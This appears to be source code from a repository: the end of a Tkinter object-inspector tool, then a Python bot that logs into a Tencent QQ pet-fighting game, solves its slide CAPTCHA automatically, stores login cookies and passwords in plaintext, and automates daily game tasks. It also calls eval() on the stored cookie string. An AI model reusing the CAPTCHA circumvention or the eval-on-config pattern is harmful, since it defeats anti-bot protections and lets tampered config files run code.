if (largestID < font.Font.measure(font.nametofont("TkDefaultFont"), idString)):
largestID = font.Font.measure(font.nametofont("TkDefaultFont"), idString)
if (largestSymbol < font.Font.measure(font.nametofont("TkDefaultFont"), symbolString)):
largestSymbol = font.Font.measure(font.nametofont("TkDefaultFont"), symbolString)
if (largestValue < font.Font.measure(font.nametofont("TkDefaultFont"), valueString)):
largestValue = font.Font.measure(font.nametofont("TkDefaultFont"), valueString)
tree.column("#0", width = (largestType * 3))
tree.column(0, width = (largestID * 3))
tree.column(1, width = (largestSymbol * 3))
tree.column(2, width = (largestValue * 3))
# Select the proper tree item when right clicked, and open the right click menu.
def treeMenu(self, event, tree):
iid = tree.identify_row(event.y)
if (iid):
tree.selection_set(iid)
if (tree == self.globalTree):
self.gRightClickMenu.post(event.x_root, event.y_root)
elif (tree == self.objectTree):
self.oRightClickMenu.post(event.x_root, event.y_root)
else:
self.iRightClickMenu.post(event.x_root, event.y_root)
# Select the proper list item when right clicked, and open the right click menu.
def listMenu(self, event, listbox):
listbox.selection_clear(0, tkinter.END)
listbox.selection_set(listbox.nearest(event.y))
listbox.activate(listbox.nearest(event.y))
selection = listbox.get(listbox.curselection()[0])
if (selection != None):
self.tRightClickMenu.post(event.x_root, event.y_root)
# Populate the type list with every object type tracked by the GC.
def populateTypeList(self):
self.typeList.delete(0, tkinter.END)
objects = gc.get_objects()
typesList = []
for obj in objects:
if (not type(obj).__name__ in typesList):
typesList.append(type(obj).__name__)
typesList.sort()
for t in typesList:
self.typeList.insert(tkinter.END, t)
# Insert item into treeview.
def insertTree(self, tree, symbol, object, parent):
objectType = type(object).__name__
children = [] # [key, value, parent]
def getIid():
if (tree == self.globalTree):
self.globIid += 1
return(self.globIid)
elif (tree == self.objectTree):
self.objIid += 1
return(self.objIid)
else: # self.inspectorTree
self.inspectorIid += 1
return(self.inspectorIid)
if (objectType == 'int' or objectType == 'float' or objectType == 'bool' or objectType == 'str' or objectType == 'complex'):
tree.insert(parent=parent, index='end', iid=getIid(), text=objectType, values=(id(object), symbol, object))
elif (objectType == 'list' or objectType == 'set' or objectType == 'tuple'):
parentIid = getIid()
tree.insert(parent=parent, index='end', iid=parentIid, text=objectType, values=(id(object), symbol, ("<" + objectType + " '" + str(len(object)) + "'>")))
for child in object:
children.append(["", child, parentIid])
elif (objectType == 'dict'):
parentIid = getIid()
tree.insert(parent=parent, index='end', iid=parentIid, text=objectType, values=(id(object), symbol, ("<" + objectType + " '" + str(len(object)) + "'>")))
for child in object:
children.append([child, object[child], parentIid])
elif (objectType == 'function' or objectType == 'method'):
callView = symbol + str(self.funcArgs(object)).replace("[", "(").replace("]", ")").replace("'", "")
tree.insert(parent=parent, index='end', iid=getIid(), text=objectType, values=(id(object), symbol, callView))
else:
tree.insert(parent=parent, index='end', iid=getIid(), text=objectType, values=(id(object), symbol, object))
return(children)
# Populate global symbol list tree.
def populateGlobalTree(self, tree):
self.globIid = -1
# Clear contents of global tree.
for glob in self.globalTree.get_children():
self.globalTree.delete(glob)
# Add item to tree, return all children of item. (Too much recursion may cause stack overflow, need to iterate.)
def addItem(tree, key, value, parent=''):
children = self.insertTree(tree, key, value, parent)
return(children)
# Remove all imports caused by injecting inspector.
localModules = ["os", "sys", "subprocess", "importlib", "tkinter", "ttk", "font"]
unsorted = dict(globals())
for module in localModules:
if (not module in self.preserved):
del(unsorted[module])
# Sort all globals into types.
sorted = {}
for object in unsorted:
typeName = type(unsorted[object]).__name__
if (not typeName in sorted):
sorted[typeName] = {}
sorted[typeName][object] = unsorted[object]
# Parse sorted items into list with no parent.
# Items Element = [key, value, parent]
items = []
for sType in sorted:
for item in sorted[sType]:
items.append([item, sorted[sType][item], ''])
# While there are still items to add, pass to addItem and add children to items.
while (len(items) > 0):
item = items.pop()
children = addItem(tree, item[0], item[1], item[2])
items.extend(children)
return(tree)
# Populate the objects tree with chosen type of object.
def populateObjectTree(self, objectType):
self.objIid = -1
for glob in self.objectTree.get_children():
self.objectTree.delete(glob)
def addItem(tree, key, value, parent=''):
children = self.insertTree(tree, key, value, parent)
return(children)
if (not objectType == None and not objectType == "NoneType"):
self.objectTreeType = objectType
objects = gc.get_objects()
toAdd = []
for obj in objects:
if (type(obj).__name__ == objectType):
toAdd.append(obj)
items = []
for item in toAdd:
symbol = ''
for glob in dict(globals()):
if (id(globals()[glob]) == id(item)):
symbol = glob
items.append([symbol, item, ''])
while (len(items) > 0):
current = items.pop()
children = addItem(self.objectTree, current[0], current[1], current[2])
items.extend(children)
self.resizeTreeColumns(self.objectTree)
# Populate the inspector tree with object and children.
# Populate the inspector tree with object and its first level children.
def populateInspectorTree(self, rootObject):
self.inspectorObjs = {id(rootObject): rootObject}
self.inspectorIid = -1
# Wipe previous tree.
for obj in self.inspectorTree.get_children():
self.inspectorTree.delete(obj)
# Search for symbol in global scope.
rootSymbol = ""
for glob in dict(globals()):
if id(globals()[glob]) == id(rootObject):
rootSymbol = glob
# Add object, and then first level children.
self.insertTree(self.inspectorTree, rootSymbol, rootObject, "")
self.parseChildren(0)
self.resizeTreeColumns(self.inspectorTree)
# Spawn Inspector in daemon thread, clean globals.
threading.Thread(target=Inspector, daemon=True).start()
|
functions.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""
@File : functions.py
@Contact : 958615161@qq.com
@Modify Time @Author @Version @Desciption
------------ ------- -------- -----------
2020/8/8 20:55 zjppp 1.0 None
"""
import json
import random
import re
import sys
import threading
import time
from datetime import datetime
from time import sleep
import requests
from selenium import webdriver
from selenium.webdriver import DesiredCapabilities
from slideVerfication import SlideVerificationCode
today = time.strftime("%Y-%m-%d", time.localtime())
dayOfWeek = datetime.now().isoweekday()
hour = datetime.now().hour
minute = datetime.now().minute
header = {
'accept': '*/*',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'zh-CN,zh;q=0.9',
'referer': 'https://fight.pet.qq.com/',
'sec-fetch-mode': 'cors',
'sec-fetch-site': 'origin',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36',
'x-requested-with': 'XMLHttpRequest'
}
cookie = {}
req = requests.Session()
req.headers = header
def login(userconf, conf, user, log, longintype=0):
"""
็ปๅฝ
:param userconf:ๅฝๅ็จๆท็้
็ฝฎ
:param conf:ๅฝๅ็จๆทๅ
:param user:
:param log:
:param longintype:
:return:
"""
log.info("---------------------------------------------------------")
flag = False
cookie = userconf.get("cookie")
username = userconf.get("username")
pwd = userconf.get("password")
if len(str(cookie)) != 0:
cookie = eval(cookie)
flag = isLogin(header, cookie, username) # ๆช่ฟๆ-True
if flag:
print("cookie็ปๅฝๆๅ")
else:
try:
print("cookieไธๅญๅจๆๅทฒๅคฑๆ๏ผไฝฟ็จๅฏ็ ็ปๅฝ")
# PhantomJSไผช่ฃ
chrome
dcap = dict(DesiredCapabilities.PHANTOMJS)
dcap['phantomjs.page.settings.userAgent'] = ('Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36')
driver = webdriver.PhantomJS(executable_path=r"phantomjs",desired_capabilities=dcap,service_args=['--ignore-ssl-errors=true'])
# driver = webdriver.Chrome(executable_path='chromedriver')
driver.implicitly_wait(3)
if str(longintype).startswith("0"):
# ๆนๆก0 ็งปๅจ็ซฏๆธธๆๅ
ฅๅฃ็ปๅฝ
log.info("ๅๅค็ป้ไธญ.....")
driver.get(
"http://ui.ptlogin2.qq.com/cgi-bin/login?appid=614038002&style=9&s_url=http%3A%2F%2Fdld.qzapp.z.qq.com%2Fqpet%2Fcgi-bin%2Fphonepk%3Fcmd%3Dindex%26channel%3D0")
driver.find_element_by_id('u').clear()
driver.find_element_by_id('u').send_keys(username)
driver.find_element_by_id('p').clear()
driver.find_element_by_id('p').send_keys(pwd)
driver.find_element_by_id('go').click()
sleep(5)
else:
# ๆนๆก1 ็ฉบ้ดๆธธๆๅบ็จไธญๅฟ็ปๅฝ
log.info("ๅๅค็ป้ไธญ.....")
driver.get(
"https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=549000912&daid=5&s_url=https%3A%2F%2Fgame.qzone.qq.com%2F%3Ffrom%3Dgameapp&style=20&border_radius=1&target=top&maskOpacity=40&")
driver.find_element_by_id('switcher_plogin').click()
driver.find_element_by_id('u').clear()
driver.find_element_by_id('u').send_keys(username)
driver.find_element_by_id('p').clear()
driver.find_element_by_id('p').send_keys(pwd)
driver.find_element_by_id('login_button').click()
sleep(5)
currentUrl = str(driver.current_url)
# ่ฟ่กๆปๅจ้ช่ฏ
if currentUrl.startswith("https://ui.ptlogin2.qq.com/cgi-bin/login"):
log.info("ๆฌๆฌก็ปๅฝๅบ็ฐๆปๅจ้ช่ฏ็ ๏ผๅฐ่ฏ่ชๅจ่ฏๅซไธญ......")
sleep(5)
# ่ฟ่กๆปๅจ้ช่ฏ
# 1ๅฎไฝ้ช่ฏ็ ๆๅจ็iframe,ๅนถ่ฟ่กๅๆข
v_frame = driver.find_element_by_id('tcaptcha_iframe')
driver.switch_to.frame(v_frame)
# 2่ทๅ้ช่ฏ็ ๆปๅๅพๅ
็ด
sli_ele = driver.find_element_by_id('slideBlock')
# 3่ทๅ้ช่ฏ็ ่ๆฏๅพ็ๅ
็ด
bg_ele = driver.find_element_by_id('slideBg')
# 4 ่ฏๅซๆปๅ้่ฆๆปๅจ็่ท็ฆป
# 4.1่ฏๅซ่ๆฏ็ผบๅฃไฝ็ฝฎ
sv = SlideVerificationCode()
distance = sv.get_element_slide_distance(sli_ele, bg_ele)
# 4.2 ๆ นๆฎ้กต้ข็็ผฉๆพๆฏๅ่ฐๆดๆปๅจ่ท็ฆป
dis = distance * (280 / 680) + 10
# 5 ่ทๅๆปๅๆ้ฎ
sli_btn = driver.find_element_by_id('tcaptcha_drag_thumb')
# 6ๆๅจๆปๅ่ฟ่ก้ช่ฏ
flag = sv.slide_verification(driver, sli_btn, dis)
sleep(3)
currentUrl = str(driver.current_url)
flag = ""
if str(longintype).startswith("0"):
flag = "https://dld.qzapp.z.qq.com/qpet/cgi-bin"
else:
flag = "https://game.qzone.qq.com/?from=gameapp"
if currentUrl.startswith(flag):
log.info("็ปๅฝๆๅ๏ผๅๅคๅผๅงๆง่กไปปๅก")
else:
log.info("็ป้ๅคฑ่ดฅ๏ผ่ชๅจ้ๅบ")
sleep(1)
driver.quit()
sleep(1)
sys.exit()
sleep(5)
cookie = getCookie(driver, log)
# print("ๅๅ
ฅ๏ผ" + str(user)) #debug
# print(cookie)
conf.read("./conf/user.conf") # ๆไปถ่ทฏๅพ่ฏปconf
conf.set(user, "cookie", str(cookie)) # ไฟฎๆนๆๅฎsection ็option
with open('./conf/user.conf', 'w') as configfile:
conf.write(configfile)
finally:
driver.quit()
req.cookies.update(cookie)
def isLogin(header, cookie, qqnum):
response = req.get("https://fight.pet.qq.com/cgi-bin/petpk?cmd=view&kind=0&sub=2&type=4&selfuin=" + str(qqnum),
headers=header, cookies=cookie)
json = parser(response)
flag = False
if str(json.get("msg")).startswith("OK"):
flag = True
return flag
def getCookie(driver, log):
"""
่ทๅcookie
:param driver:webdriver
:return: cookie_dict cookieๅญๅ
ธ
"""
cookie_list = driver.get_cookies()
cookie_dict = {}
for cookie in cookie_list:
if 'name' in cookie and 'value' in cookie:
cookie_dict[cookie['name']] = cookie['value']
log.info("่ทๅcookieๆๅ")
return cookie_dict
# ๅฝๅไธชไบบ็ถๆtodo
def getPersonalStatus(html):
"""
:param html:
:return:
"""
str1 = str(html)
regex = []
regex.append(r"็ญ็บง:[1-9]\d*๏ผ[1-9]\d*/[1-9]\d*๏ผ") # ๅน้
็ญ็บง
regex.append(r"ไฝๅ:[1-9]\d*/[1-9]\d*") # ๅน้
ไฝๅ
regex.append(r"ๆดปๅ:[1-9]\d*/[1-9]\d*") # ๅน้
ๆดปๅ
regex.append(r"็ๅฝ:[1-9]\d*\+[1-9]\d*") # ๅน้
็ๅฝ
regex.append(r"ๅ้:[1-9]\d*\+[1-9]\d*") # ๅน้
ๅ้
regex.append(r"ๆๆท:[1-9]\d*\+[1-9]\d*") # ๅน้
ๆๆท
regex.append(r"้ๅบฆ:[1-9]\d*\+[1-9]\d*") # ๅน้
้ๅบฆ
statusDict = {}
for i in range(7):
value = re.compile(regex[i]).search(str1).group()
var = value.split(":", 2)
statusDict[var[0]] = var[1]
return statusDict
def generateID(idtype):
'''
็ๆ้ฎ้ผid๏ผ็ๆ่งๅ๏ผ
1็บง:(1-4)110๏ผ1-4๏ผ0000 -> a110b0000
2็บง:(1-4๏ผ210๏ผ0-9๏ผ00๏ผ01-10๏ผ -> a210c00d
3็บง:(1-4๏ผ310๏ผ0-9๏ผ๏ผ0001-4000๏ผ -> a310ce
:param idtype:็ๆid็็ฑปๅ
:return: id
'''
a = random.randint(1, 4)
b = random.randint(1, 4)
c = random.randint(0, 9)
d = random.randint(1, 10)
d = str(d).zfill(2)
e = random.randint(1, 4000)
e = str(e).zfill(4)
if idtype == 3:
return str(a) + "310" + str(c) + e
elif idtype == 2:
return str(a) + "210" + str(c) + "00" + d
else:
return str(a) + "110" + str(b) + "0000"
def kezhanlingjiang(log):
"""
ๅฎขๆ ้ขๅฅ
:param log: ๆฅๅฟ่พๅบ
:return:
"""
kezhandajianlingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=knight&op=14&type=1&id=%(id)s"
kezhanzhudianlingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=knight&op=14&type=2&id=%(id)s"
for i in range(3):
if 8 <= hour < 20:
j = requestURL(kezhanzhudianlingjiang % {"id": str(i + 1)})
if str(j.get("msg")).startswith("ๅฅๅฑๅทฒ็ป้ขๅ่ฟไบ"):
continue
log.info(j.get("msg"))
else:
j = requestURL(kezhandajianlingjiang % {"id": str(i + 1)})
if str(j.get("msg")).startswith("ๅฅๅฑๅทฒ็ป้ขๅ่ฟไบ"):
continue
log.info(j.get("msg"))
def mengxiangzhilv(log):
"""
ๆขฆๆณไนๆ
todo ้ขๅฅ
:param log: ๆฅๅฟ่พๅบ
:return:
"""
mengxiangzhilvchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=dreamtrip&bmapid=0&sub=0"
mengxiangzhilvputong = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=dreamtrip&smapid=0&sub=1"
mengxiangzhilvquyujiangli = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=dreamtrip&bmapid=%(bmapid)s&sub=2"
j = requestURL(mengxiangzhilvchaxun)
curid = j.get("curid") # ๅฝๅๅฒๅฑฟid
normalticket = j.get("normalticket")
if int(normalticket) > 0:
# ๆฎ้ๆ
่ก1ๆฌก
j = requestURL(mengxiangzhilvputong)
msg = j.get("msg")
if not str(msg).startswith("ๅฝๅๆฒกๆๆฎ้ๆบ็ฅจ"):
log.info("ๆขฆๆณไนๆ
-ๆฎ้ๆ
่ก๏ผ" + msg)
# ๅบๅ้ขๅฅ
j = requestURL(mengxiangzhilvchaxun)
smap_info = j.get("smap_info") # ๅฝๅๅฒๅฑฟไฟกๆฏ
bmap_info = j.get("bmap_info") # ๆๆๅฒๅฑฟไฟกๆฏ
flag = True
for item in smap_info:
if int(item.get("status")) != 1:
flag = False
break
if flag == True:
j = requestURL(mengxiangzhilvquyujiangli % {"bmapid": curid})
msg = j.get("msg")
log.info("ๆขฆๆณไนๆ
-ๅบๅ้ขๅฅ๏ผ" + msg)
sum = 0
for item in bmap_info:
sum = sum + int(item.get("status"))
if sum == 4: # 4ไธชๅบๅๅ
จไธบ1
pass # todo ้ขๅ
จๅบๅฅๅฑ
pass
def huajuanmizong(log):
"""
็ปๅท่ฟท่ธช
:param log:
:return:
"""
huajuanmizongchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=scroll_dungeon"
huajuanmizong = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=scroll_dungeon&op=fight&buff=0"
j = requestURL(huajuanmizongchaxun)
free_times = j.get("free_times")
pay_times = j.get("pay_times")
if int(free_times) + int(pay_times) == 0:
return
# ๆ5ๆฌก
for i in range(10):
j = requestURL(huajuanmizong)
msg = j.get("msg")
if str(msg).startswith("ๆฒกๆๆๆๆฌกๆฐ"):
break
else:
log.info("็ปๅท่ฟท่ธช-ๆๆ๏ผ" + msg)
def qunxiongzhulu(log):
"""
็พค้้้นฟ
:param log:
:return:
"""
qunxiongbaoming = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=thronesbattle&op=signup"
qunxionglingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=thronesbattle&op=drawreward"
qunxiongchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=thronesbattle"
qunxiongpaihangbangchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=thronesbattle&op=queryrank&type=season&zone=%(zone)s"
qunxiongpaihangbanglingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=thronesbattle&op=drawrankreward"
# 1.ๆฅๅ
if (dayOfWeek == 5 and hour >= 14) or (dayOfWeek == 1 and hour < 14) or (6 <= dayOfWeek <= 7):
j = requestURL(qunxiongbaoming)
msg = j.get("msg")
log.info("็พค้้้นฟ-ๆฅๅ๏ผ" + msg)
# 2.้ขๅฅ
j = requestURL(qunxionglingjiang)
msg = j.get("msg")
if str(msg).startswith("ไฝ ๅทฒ็ป้ขๅ"):
pass
else:
log.info("็พค้้้นฟ-้ขๅฅ" + msg)
# 3.ๆ่กๆฆ้ขๅฅ
# response = requests.get(URL.qunxiongpaihangbang, headers=header, cookies=cookie)
# HTML = response.content.decode('utf-8')
j = requestURL(qunxiongchaxun)
signed_up_zone = j.get("signed_up_zone")
if str(signed_up_zone) in ["1", "2", "3", "4"]:
j = requestURL(qunxiongpaihangbangchaxun % {"zone": str(signed_up_zone)})
self_rank = j.get("self_rank")
if int(self_rank) > 0 and int(self_rank) <= 1000:
j = requestURL(qunxiongpaihangbanglingjiang)
msg = j.get("msg")
if str(msg).startswith("ๆฌๅฑๅทฒ็ป้ขๅๆ่กๆฆๅฅๅฑ"):
pass
else:
log.info("็พค้้้นฟ-ๆ่กๆฆ้ขๅฅ" + msg)
def huanjing(log):
"""
ๅนปๅข
:param log:
:return:
"""
huanjingtuichu = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=misty&op=return"
huanjingjinru = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=misty&op=start&stage_id=%(stage_id)s"
huanjingzhandou = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=misty&op=fight"
# ้ๅบๅฏๆฌ
j = requestURL(huanjingtuichu)
# ่ฟๅ
ฅๅฏๆฌ(idไธบ1-20)
j = requestURL(huanjingjinru % {"stage_id": "20"})
msg = j.get("msg")
if str(msg).startswith("ๅฏๆฌๆชๅผ้") or str(msg).startswith("ๆจ็ๆๆๆฌกๆฐๅทฒ็จๅฎ๏ผ่ฏทๆๆฅๅๆ"):
log.info("ๅนปๅข-่ฟๅ
ฅๅฏๆฌ๏ผ" + msg)
else:
cur_stage = j.get("cur_stage")
log.info("ๅนปๅข-่ฟๅ
ฅๅฏๆฌ๏ผ็ฌฌ" + str(cur_stage) + "ๅ
ณ")
# ๆๆ
for i in range(5):
j = requestURL(huanjingzhandou)
msg = j.get("msg")
log.info("ๅนปๅข-ๆๆ๏ผ" + msg)
# ้ๅบๅฏๆฌ
j = requestURL(huanjingtuichu)
msg = j.get("msg")
if str(msg).startswith("ๅฝๅๅฏๆฌๆช็ปๆ"):
pass
else:
challenge_times = j.get("challenge_times")
log.info("ๅนปๅข-้ๅบๅฏๆฌ๏ผๅฝๅๅฉไฝๆๆๆฌกๆฐ " + challenge_times)
def lilian(bossid, times, log):
"""
ๅ็ปๆๅฎbossid๏ผๆtimesๆฌก
:param bossid: boss็id
:param times: ๆๆๆฌกๆฐ๏ผๆๅคง3ๆฌก๏ผ
:param log:
:return:
"""
lilian = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=mappush&type=1&npcid=%(npcid)s"
for i in range(min(int(times), 3)):
j = requestURL(lilian % {"npcid": str(bossid)})
msg = j.get("msg")
if str(msg) == "":
log.info("ๅ็ป๏ผๆๆๆๅ")
else:
log.info("ๅ็ป๏ผ" + msg)
def xuyuan(username, log):
"""
่ฎธๆฟ
:param username:
:param log:
:return:
"""
xuyuanjinrilingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=wish&sub=3"
xuyuanjinri = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=wish&sub=2"
xuyuanchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=wish&sub=1"
xuyuansantian = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=wish&sub=6"
# ้ขๅๆจๆฅ่ฎธๆฟๅฅๅฑ
j = requestURL(xuyuanjinrilingjiang)
if j != None:
msg = j.get("msg")
if not str(msg).startswith("ๅพๆฑๆญ"):
name = j.get("name")
num = j.get("num")
log.info("่ฎธๆฟ๏ผ่ทๅ" + name + "*" + num)
# ๆ่ชๅทฑไธๆฌก๏ผ็กฎไฟๆ้ฆ่
fight(log, username)
# ่ฟๅ
ฅไปๆฅ่ฎธๆฟ
j = requestURL(xuyuanjinri)
msg = j.get("msg")
if str(msg).startswith("่ฎธๆฟๅคฑ่ดฅ๏ผ่ฏทๅ่ฏไธๆฌก"):
pass
else:
log.info("่ฎธๆฟ๏ผ" + msg)
j = requestURL(xuyuanchaxun)
days = j.get("days")
if str(days).startswith("3"):
# ้ขๅ่ฟ็ปญ3ๅคฉ่ฎธๆฟๅฅๅฑ
j = requestURL(xuyuansantian)
msg = j.get("msg")
log.info("่ฎธๆฟ๏ผ" + msg)
def huangjinliansai(log):
"""
้ป้่่ต todo ่ตๅญฃๆซ้ขๅฅ๏ผๆๆ
:param log:
:return:
"""
huangjinliansailingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=factionleague&op=5"
# 1.้ป้่่ต้ขๅฅ
j = requestURL(huangjinliansailingjiang)
msg = j.get("msg")
log.info("้ป้่่ต๏ผ" + msg)
def fight(log, qqnum):
"""
ๆๆๆๅฎqqๅท
:param log:
:param qqnum: QQๅท
:return:
"""
qqfight = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=fight&puin=%(puin)s"
response = req.get(qqfight % {"puin": str(qqnum)})
# result = jiexifanhuixiaoxi(response,"result")
def shiergong(log, scene_id=1011):
"""
ๅไบๅฎซ
:param log:
:param scene_id: ๅบๆฏid๏ผ่ๅดไธบ1000-1011
:return:
"""
shiergongchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=zodiacdungeon&op=query"
shiergong = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=zodiacdungeon&op=autofight&pay_recovery_count=0&scene_id=%(scene_id)s"
j = requestURL(shiergongchaxun)
left_challenge_times = j.get("left_challenge_times")
if int(left_challenge_times) != 0:
j = requestURL(shiergong % {"scene_id": str(scene_id)})
msg = j.get("msg")
log.info("ๅไบๅฎซ-ๆๆ๏ผ" + msg)
def tiguan(log):
"""
่ธข้ฆ
:param log:
:return:
"""
tiguanchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=fac_challenge&subtype=0"
tiguanzhuanpan = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=fac_challenge&subtype=6"
tiguanshilian = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=fac_challenge&subtype=2"
tiguantiaozhan = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=fac_challenge&subtype=3"
tiguanlingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=fac_challenge&subtype=9"
tiguanpaihangbanglingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=fac_challenge&subtype=10"
j = requestURL(tiguanchaxun)
isFightTime = j.get("isFightTime")
isAwardTime = j.get("isAwardTime")
if str(isFightTime).startswith("1"):
highRadio = j.get("highRadio")
figntNpcTimes = j.get("figntNpcTimes")
MaxFightNpcTimes = j.get("MaxFightNpcTimes")
if str(highRadio).startswith("1"):
j = requestURL(tiguanzhuanpan)
msg = j.get("msg")
if not str(msg).startswith("ๆจๅทฒ็ปไฝฟ็จ่ฟ1ๆฌก"):
log.info("่ธข้ฆ-่ฝฌ็๏ผ" + msg)
for i in range(int(MaxFightNpcTimes) - int(figntNpcTimes)):
j = requestURL(tiguanshilian)
msg = j.get("msg")
log.info("่ธข้ฆ-่ฏ็ผ๏ผ" + msg)
for i in range(30):
j = requestURL(tiguantiaozhan)
msg = j.get("msg")
if str(msg).startswith("๏ผ"):
log.info("่ธข้ฆ-ๆๆ๏ผ" + msg)
else:
break
if str(isAwardTime).startswith("1"):
j = requestURL(tiguanlingjiang)
msg = j.get("msg")
if not str(msg).startswith("ๆจๅทฒ้ขๅ่ฟๅฅๅฑ"):
log.info("่ธข้ฆ-้ขๅฅ๏ผ" + msg)
j = requestURL(tiguanpaihangbanglingjiang)
msg = j.get("msg")
if not str(msg).startswith("ๆฑๆญ๏ผๆจๅทฒ็ป้ขๅ่ฟๅฅๅฑ"):
log.info("่ธข้ฆ-้ขๅฅ๏ผ" + msg)
def liangcao(log):
"""
็ฒฎ่
:param log:
:return:
"""
liangcaochaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=forage_war"
liangcaolingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=forage_war&subtype=6"
liangcaojingongchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=forage_war&subtype=3"
liangcaobaoxiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=forage_war&subtype=5"
if (dayOfWeek == 2 and hour >= 6) or (dayOfWeek == 3 and hour < 6):
j = requestURL(liangcaobaoxiang)
msg = j.get("msg")
if not str(msg).startswith("ไฝ ๅทฒ้ขๅ่ฟ่ฏฅๅฅๅฑ"):
log.info("็ฒฎ่-้ขๅฅ๏ผ" + msg)
else:
j = requestURL(liangcaochaxun)
gift = j.get("gift")
if str(gift).startswith("1"):
j = requestURL(liangcaolingjiang)
msg = j.get("msg")
log.info("็ฒฎ่-้ขๅฅ๏ผ" + msg)
def kuangdong(log):
"""
็ฟๆด
:param log:
:return:
"""
kuangdongchakan = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=factionmine"
kuangdongzhandou = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=factionmine&op=fight"
kuangdonglingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=factionmine&op=reward"
j = requestURL(kuangdongchakan)
reward_rank = j.get("reward_rank")
fight_times = j.get("fight_times")
current_dungeon_pos = j.get("current_dungeon_pos")
if int(reward_rank) > 0: # ็ฟๆด้ขๅฅ
reward_message = j.get("reward_message")
mines = j.get("mines")
j = requestURL(kuangdonglingjiang)
msg = j.get("msg")
log.info("็ฟๆด-้ขๅฅ๏ผ" + reward_message + "่ทๅพ็ฟ็ณ" + mines + "ใ" + msg)
if 1 <= int(current_dungeon_pos) <= 15 and int(fight_times) < 3:
for i in range(3 - int(fight_times)):
j = requestURL(kuangdongzhandou)
msg = j.get("msg")
log.info("็ฟๆด-ๆๆ๏ผ" + msg)
def xieshenmibao(log):
"""
้ช็ฅ็งๅฎ
:param log:
:return:
"""
xieshenmibaochaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=tenlottery"
xieshengaoji = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=tenlottery&type=0&op=2"
xieshenjipin = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=tenlottery&type=1&op=2"
j = requestURL(xieshenmibaochaxun)
advanced = j.get("advanced")
extreme = j.get("extreme")
extreme = j.get("extreme")
if str(advanced.get("ifFree")).startswith("1"): # 0-ๆฒกๆๅ
่ดนๆฌกๆฐ๏ผ1-ๆๅ
่ดนๆฌกๆฐ
j = requestURL(xieshengaoji)
msg = j.get("msg")
log.info("้ช็ฅ็งๅฎ-็ดซ่ฒ็งๅฎ๏ผ" + msg)
if str(extreme.get("ifFree")).startswith("1"): # 0-ๆฒกๆๅ
่ดนๆฌกๆฐ๏ผ1-ๆๅ
่ดนๆฌกๆฐ
j = requestURL(xieshenjipin)
msg = j.get("msg")
log.info("้ช็ฅ็งๅฎ-ๆฉ่ฒ็งๅฎ๏ผ" + msg)
def dianfeng(log):
"""
ๅท
ๅณฐไนๆ
:param log:
:return:
"""
dianfengchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=gvg&sub=0"
dianfengsuijibaoming = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=gvg&sub=1&group=0"
dianfenglingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=gvg&sub=4"
j = requestURL(dianfengchaxun)
userinfo = j.get("userinfo")
if ((dayOfWeek == 1 and hour >= 6) or (dayOfWeek == 2 and hour < 24)) and str(userinfo["group"]).startswith("0"):
# ๅท
ๅณฐ้ๆบๆฅๅ ๆฏๅจไธๆฉไธ6็น~ๅจไบ24็น
j = requestURL(dianfengsuijibaoming)
msg = j.get("msg")
log.info("ๅท
ๅณฐไนๆ-ๆฅๅ๏ผ" + msg)
# ้ขๅฅ
j = requestURL(dianfenglingjiang)
msg = j.get("msg")
if str(msg).startswith("ๆจๅทฒ็ป้ขๅ่ฟไบ"):
pass
else:
log.info("ๅท
ๅณฐไนๆ-้ขๅฅ๏ผ" + msg)
if hour >= 6 and hour < 24 and dayOfWeek >= 3 and dayOfWeek <= 7:
j = requestURL(dianfengchaxun)
userinfo = j.get("userinfo")
chall_status = userinfo.get("chall_status")
if str(chall_status).startswith("2"):
pass
else:
try:
dianfeng = threading.Thread(target=dianfengrun, args=(log,))
dianfeng.start()
except:
